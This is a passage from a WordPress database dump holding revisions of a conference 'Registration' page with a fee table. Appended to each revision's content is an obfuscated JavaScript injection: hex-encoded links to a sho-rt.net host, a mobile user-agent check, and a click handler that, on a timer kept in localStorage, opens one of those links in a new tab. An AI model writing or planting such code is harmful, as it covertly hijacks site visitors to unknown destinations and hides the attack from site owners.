function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:00:46','2022-10-09 01:00:46','',2638,'https://gsw2023.com/?p=2641',0,'revision','',0),
(2642,1,'2022-10-09 01:03:20','2022-10-09 01:03:20','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h3><strong><span style=\"font-size: 14px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h3>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:03:20','2022-10-09 01:03:20','',2638,'https://gsw2023.com/?p=2642',0,'revision','',0),
(2643,1,'2022-10-09 01:15:23','2022-10-09 01:15:23','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h2><strong><span style=\"font-size: 14px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h2>\n<div class=\"three_quarter first\">\n<section class=\"clear\">\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\n</section>\n</div>\n<p>[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\"><strong>Standard</strong></td>\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\n</tr>\n<tr>\n<td>Early bird</td>\n<td>Late</td>\n<td>On Site</td>\n<td>Early bird</td>\n<td>Late</td>\n<td>On Site</td>\n<td>Early bird</td>\n<td>Late</td>\n<td>On Site</td>\n</tr>\n<tr>\n<td>1 Day</td>\n<td>$250</td>\n<td>$300</td>\n<td>$350</td>\n<td>$150</td>\n<td>$200</td>\n<td> $250</td>\n<td>$100</td>\n<td>$100</td>\n<td>$125</td>\n</tr>\n<tr>\n<td>2 Days</td>\n<td> $350</td>\n<td>$400</td>\n<td>$450</td>\n<td> $200</td>\n<td>$250</td>\n<td>$300</td>\n<td>$125</td>\n<td>$125</td>\n<td>$150</td>\n</tr>\n<tr>\n<td>3 Days</td>\n<td> $450</td>\n<td>$500</td>\n<td>$550</td>\n<td> $250</td>\n<td>$300</td>\n<td>$350</td>\n<td>$150</td>\n<td>$150</td>\n<td>$175</td>\n</tr>\n<tr>\n<td>4 Days</td>\n<td>$550</td>\n<td>$600</td>\n<td>$650</td>\n<td>$300</td>\n<td> $350</td>\n<td>$400</td>\n<td>$175</td>\n<td>$175</td>\n<td>$200</td>\n</tr>\n<tr>\n<td>5 Days</td>\n<td> $650</td>\n<td>$700</td>\n<td>$750</td>\n<td>$350</td>\n<td>$400</td>\n<td>$450</td>\n<td>$200</td>\n<td>$200</td>\n<td>$225</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box][/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 